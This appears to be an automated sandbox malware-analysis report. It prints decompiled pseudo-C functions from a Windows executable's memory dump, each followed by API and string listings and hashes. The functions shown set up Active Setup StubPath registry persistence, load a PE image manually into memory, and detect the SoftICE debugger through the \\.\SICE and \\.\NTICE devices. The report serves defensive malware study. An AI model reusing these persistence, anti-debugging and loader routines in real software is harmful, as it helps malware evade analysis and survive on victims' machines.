				void* _t43;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t62;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t43 = __ecx;
				_push(_t62);
				_push(0x40698a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t62;
				E00401CAC( &_v16, __edx);
				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0); // executed
				E00401CAC( &_v20, _t43);
				_t26 = E00401D50(_v20);
				_t27 =  *0x40d090; // 0x0
				_t28 = E00401D50(_t27);
				E00401CAC( &_v24, _t43);
				_t53 =  *0x40d090; // 0x0
				E00401D58( &_v24, _t53);
				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28); // executed
				RegCloseKey(_v8);
				_pop(_t54);
				 *[fs:eax] = _t54;
				_push(E00406991);
				return E00401AE4( &_v24, 4);
			}















                                    0x004068b7
                                    0x004068b9
                                    0x004068bb
                                    0x004068bd
                                    0x004068bf
                                    0x004068c3
                                    0x004068c9
                                    0x004068ca
                                    0x004068cf
                                    0x004068d2
                                    0x004068ea
                                    0x004068fa
                                    0x0040690d
                                    0x00406917
                                    0x0040691f
                                    0x00406926
                                    0x0040692b
                                    0x00406938
                                    0x00406940
                                    0x00406946
                                    0x00406961
                                    0x0040696a
                                    0x00406971
                                    0x00406974
                                    0x00406977
                                    0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: 206985d672d90e257182974d08c54b0c86a2f00840113c06cdb0cefdbad86c8c
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: 206985d672d90e257182974d08c54b0c86a2f00840113c06cdb0cefdbad86c8c
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004019D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 31%
                                    			E004019D8() {
				struct HINSTANCE__* _t24;
				intOrPtr _t32;
				void* _t42;

				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
					L3:
					if( *0x40d004 != 0) {
						 *0x40d068();
					}
					L5:
					while(1) {
						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
							 *0x0040E5A0 = 0;
						}
						 *0x40d030();
						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
							if( *0x0040E5A4 != 0) {
								 *0x40d01c();
								_t32 =  *((intOrPtr*)(0x40e5a4));
								_t7 = _t32 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t32 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						 *0x40d034();
						if( *((char*)(0x40e5bc)) == 1) {
							 *0x0040E5B8();
						}
						if( *((char*)(0x40e5bc)) != 0) {
							E004019A8();
						}
						if( *0x40e594 == 0) {
							if( *0x40e014 != 0) {
								 *0x40e014();
							}
							ExitProcess( *0x40d000); // executed
						}
						memcpy(0x40e594,  *0x40e594, 0xb << 2);
						_t42 = _t42 + 0xc;
						0x40d000 = 0x40d000;
					}
				} else {
					do {
						 *0x40e024 = 0;
						 *((intOrPtr*)( *0x40e024))();
					} while ( *0x40e024 != 0);
					goto L3;
				}
			}






                                    0x004019ef
                                    0x00401a07
                                    0x00401a0e
                                    0x00401a10
                                    0x00401a10
                                    0x00000000
                                    0x00401a16
                                    0x00401a1a
                                    0x00401a23
                                    0x00401a23
                                    0x00401a26
                                    0x00401a30
                                    0x00401a3c
                                    0x00401a3e
                                    0x00401a44
                                    0x00401a47
                                    0x00401a47
                                    0x00401a4a
                                    0x00401a4d
                                    0x00401a54
                                    0x00401a54
                                    0x00401a4d
                                    0x00401a3c
                                    0x00401a59
                                    0x00401a63
                                    0x00401a65
                                    0x00401a65
                                    0x00401a6c
                                    0x00401a6e
                                    0x00401a6e
                                    0x00401a76
                                    0x00401a7f
                                    0x00401a81
                                    0x00401a81
                                    0x00401a8a
                                    0x00401a8a
                                    0x00401a9b
                                    0x00401a9b
                                    0x00401a9d
                                    0x00401a9d
                                    0x004019f6
                                    0x004019f6
                                    0x004019fc
                                    0x00401a00
                                    0x00401a02
                                    0x00000000
                                    0x004019f6

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403EC0, Relevance: 7.7, APIs: 5, Instructions: 177memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v52;
				long _v56;
				char _v60;
				void* _t116;
				void* _t121;
				void* _t135;
				intOrPtr _t138;
				void* _t150;
				void* _t175;
				signed int _t184;
				signed int _t185;
				intOrPtr _t189;
				intOrPtr _t197;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t209;
				signed int _t210;
				void* _t213;
				void* _t216;
				intOrPtr* _t217;

				_t208 = __edi;
				_t215 = _t216;
				_t217 = _t216 + 0xffffffc8;
				_push(__edi);
				_v44 = __ecx;
				_t183 = __edx;
				_v40 = __eax;
				_t197 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v36, _t197);
				_push(_t216);
				_push(0x4040ba);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_push(0);
				_push(_v44);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
				_v16 = _t116;
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
				_v48 = _t121;
				E00401258(_v44,  *(_v8 + 0x54), _v48);
				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t135 >= 0) {
					_v60 = _t135 + 1;
					_t185 = 0;
					do {
						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
						if(_t208 < _v52) {
							_t210 = _t208 ^ _v52;
							_v52 = _v52 ^ _t210;
							_t208 = _t210 ^ _v52;
						}
						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
						_v48 = _t175;
						E00401414(_v48, _t208);
						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
						_t185 = _t185 + 1;
						_t66 =  &_v60;
						 *_t66 = _v60 - 1;
					} while ( *_t66 != 0);
				}
				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
				_v28 = _t138;
				_v24 = _t138;
				_v36 = _v16;
				_v32 =  *(_v8 + 0x50);
				_push(0);
				E00402FBC();
				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
					E00403D08(_t145 + _v16, _t215);
				}
				_t147 =  *((intOrPtr*)(_v8 + 0x80));
				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
				}
				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t150 >= 0) {
					_v60 = _t150 + 1;
					_t184 = 0;
					do {
						_t209 = _t184 + _t184 * 4;
						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
						_t184 = _t184 + 1;
						_t101 =  &_v60;
						 *_t101 = _v60 - 1;
					} while ( *_t101 != 0);
				}
				_t189 =  *0x4037bc; // 0x4037c0
				E00402704(_a4, _t189,  &_v36);
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(E004040C1);
				_t205 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v36, _t205);
			}


































                                    0x00403ec0
                                    0x00403ec1
                                    0x00403ec3
                                    0x00403ec8
                                    0x00403ec9
                                    0x00403ecc
                                    0x00403ece
                                    0x00403ed4
                                    0x00403eda
                                    0x00403ee1
                                    0x00403ee2
                                    0x00403ee7
                                    0x00403eea
                                    0x00403ef2
                                    0x00403ef3
                                    0x00403efa
                                    0x00403efe
                                    0x00403f05
                                    0x00403f17
                                    0x00403f1c
                                    0x00403f28
                                    0x00403f3d
                                    0x00403f42
                                    0x00403f51
                                    0x00403f67
                                    0x00403f79
                                    0x00403f82
                                    0x00403f85
                                    0x00403f88
                                    0x00403f8b
                                    0x00403f8d
                                    0x00403f90
                                    0x00403f9b
                                    0x00403fa1
                                    0x00403fa3
                                    0x00403fa6
                                    0x00403fa9
                                    0x00403fa9
                                    0x00403fbf
                                    0x00403fc4
                                    0x00403fce
                                    0x00403fe3
                                    0x00403fe8
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403fe9
                                    0x00403f8d
                                    0x00403ff4
                                    0x00403ff7
                                    0x00403ffa
                                    0x00404000
                                    0x00404009
                                    0x0040400c
                                    0x0040401c
                                    0x00404027
                                    0x0040402f
                                    0x00404035
                                    0x0040403a
                                    0x0040403e
                                    0x00404046
                                    0x0040404c
                                    0x00404051
                                    0x00404059
                                    0x0040405c
                                    0x0040405f
                                    0x00404062
                                    0x00404064
                                    0x00404068
                                    0x00404082
                                    0x00404087
                                    0x00404088
                                    0x00404088
                                    0x00404088
                                    0x00404064
                                    0x00404093
                                    0x00404099
                                    0x004040a0
                                    0x004040a3
                                    0x004040a6
                                    0x004040ae
                                    0x004040b9

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004069E4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
				void* _v8;
				char* _t7;
				void** _t11;

				_t7 = __edx;
				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11); // executed
				RegDeleteKeyA(_v8, _t7); // executed
				return RegCloseKey(_v8);
			}






                                    0x004069e6
                                    0x004069fa
                                    0x00406a05
                                    0x00406a15

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406088, Relevance: 6.1, APIs: 4, Instructions: 83registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E00406088(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __esi, void* __eflags, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _t35;
				long _t46;
				intOrPtr _t66;
				void* _t72;
				char* _t73;
				void* _t76;

				_v12 = __ecx;
				_v8 = __edx;
				_t72 = __eax;
				_t60 = _a4;
				E00401F38(_v8);
				E00401F38(_v12);
				E00401F38(_a8);
				_push(_t76);
				_push(0x406167);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76 + 0xffffffec;
				E00401B14(_a4, _a8);
				_t35 = RegOpenKeyExA(_t72, E00401F48(_v8), 0, 1,  &_v16); // executed
				if(_t35 == 0) {
					_t73 = E00401F48(_v12);
					_t46 = RegQueryValueExA(_v16, _t73, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 == 0) {
						E00402074(_t60, _v24);
						RegQueryValueExA(_v16, _t73, 0,  &_v20, E00401F48( *_t60),  &_v24); // executed
						E00402074(_t60, _v24 - 1);
					}
					RegCloseKey(_v16); // executed
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E0040616E);
				E00401AE4( &_v12, 2);
				return E00401AC0( &_a8);
			}














                                    0x00406090
                                    0x00406093
                                    0x00406096
                                    0x00406098
                                    0x0040609e
                                    0x004060a6
                                    0x004060ae
                                    0x004060b5
                                    0x004060b6
                                    0x004060bb
                                    0x004060be
                                    0x004060c6
                                    0x004060dd
                                    0x004060e4
                                    0x004060fa
                                    0x00406101
                                    0x00406108
                                    0x0040610f
                                    0x0040612b
                                    0x00406136
                                    0x00406136
                                    0x0040613f
                                    0x0040613f
                                    0x00406146
                                    0x00406149
                                    0x0040614c
                                    0x00406159
                                    0x00406166

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction ID: 0e00d036d103dc2b2ef1cfb5c67197bce49365ef8cbb96d3ced269820940c9d9
                                    • Opcode Fuzzy Hash: b106ff00d2019447eb815b6a70ce28f6bc541ad976cbeee6ba3fa94798fc6654
                                    • Instruction Fuzzy Hash: 3021E075A00109BBDB00EBA9CC82EAE77BCEF49354F504176B914F72D1D778AE058764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D70, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00405D70(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				void* _t17;
				void* _t28;
				intOrPtr _t33;
				long _t36;
				void* _t39;

				_t36 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				E00401F38(_v12);
				_push(_t39);
				_push(0x405e0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff4;
				_t17 = CreateFileA(E00401F48(_v8), 0x40000000, 2, 0, 2, 0, 0); // executed
				_t28 = _t17;
				if(_t28 != 0xffffffff) {
					if(_t36 == 0xffffffff) {
						SetFilePointer(_t28, 0, 0, 0);
					}
					WriteFile(_t28, E00401F9C( &_v12), _t36,  &_v16, 0); // executed
					CloseHandle(_t28); // executed
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00405E11);
				return E00401AE4( &_v12, 2);
			}











                                    0x00405d78
                                    0x00405d7a
                                    0x00405d7d
                                    0x00405d83
                                    0x00405d8b
                                    0x00405d92
                                    0x00405d93
                                    0x00405d98
                                    0x00405d9b
                                    0x00405db6
                                    0x00405dbb
                                    0x00405dc0
                                    0x00405dc5
                                    0x00405dce
                                    0x00405dce
                                    0x00405de4
                                    0x00405dea
                                    0x00405dea
                                    0x00405df1
                                    0x00405df4
                                    0x00405df7
                                    0x00405e09

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandlePointerWrite
                                    • String ID:
                                    • API String ID: 3604237281-0
                                    • Opcode ID: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction ID: 55d088da9265c3b5ae2f525a133c65af5c973924d17bad78a6645e8f940914b1
                                    • Opcode Fuzzy Hash: 7dc1bfca9d025d0b83b5e26c46da853ac632ff7e58f76998c26eff8db92b4821
                                    • Instruction Fuzzy Hash: F1116D70A407047AE720BB75CC83F9F76ACDB05728FA04677B510B62E2DA786E00896C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405850() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\NTICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405851
                                    0x0040586a
                                    0x00405872
                                    0x00405875
                                    0x0040587a
                                    0x0040587a
                                    0x0040587f

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040586A
                                    • CloseHandle.KERNEL32(00000000,\\.\NTICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,0040589D,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405875
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\NTICE
                                    • API String ID: 3498533004-2502798147
                                    • Opcode ID: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction ID: dcdfadaa743e4582149ecbcd816e92e043e7093f062ec94bd67b511fcc83bcd2
                                    • Opcode Fuzzy Hash: debc4518062f563bffe564e22a037e3d6494d17ef5953f9ebd345af3da82e7ec
                                    • Instruction Fuzzy Hash: 27D0CAB238170039F83438A92C97F1A440C9701B29EA0833ABB20BA1E1C4A8AA29021C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405814, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00405814() {
				void* _t1;
				void* _t4;

				_t4 = 0;
				_t1 = CreateFileA("\\\\.\\SICE", 0xc0000000, 3, 0, 3, 0x80, 0); // executed
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					_t4 = 1;
				}
				return _t4;
			}





                                    0x00405815
                                    0x0040582e
                                    0x00405836
                                    0x00405839
                                    0x0040583e
                                    0x0040583e
                                    0x00405843

                                    APIs
                                    • CreateFileA.KERNEL32(\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000,00000000), ref: 0040582E
                                    • CloseHandle.KERNEL32(00000000,\\.\SICE,C0000000,00000003,00000000,00000003,00000080,00000000,00000000,00405894,00000000,0040B212,00000000,0040BF40,00000000,00000000), ref: 00405839
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID: \\.\SICE
                                    • API String ID: 3498533004-948585333
                                    • Opcode ID: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction ID: 3ad54f1ae86a7dc7f46777f6809a8286594d703ee9eb335483981d0cf1385b1e
                                    • Opcode Fuzzy Hash: ff68a70177764c28d499507b68599e559ed85a22d0656cccf2f85e6c98713594
                                    • Instruction Fuzzy Hash: B8D012723C170039F83038A51C97F07400C5701B2DEB08336BB10BD1E1C4F8B619051C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405A28, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E00405A28(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v9;
				void* _t13;
				int _t24;
				intOrPtr _t36;
				intOrPtr _t37;
				CHAR* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t45 = __eflags;
				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_push(__ebx);
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t42);
				_push(0x405ac7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_v9 = 0;
				_t13 = E00405D04(_v8, __ebx, _t45); // executed
				if(_t13 != 0) {
					_push(_t42);
					_push(0x405aa7);
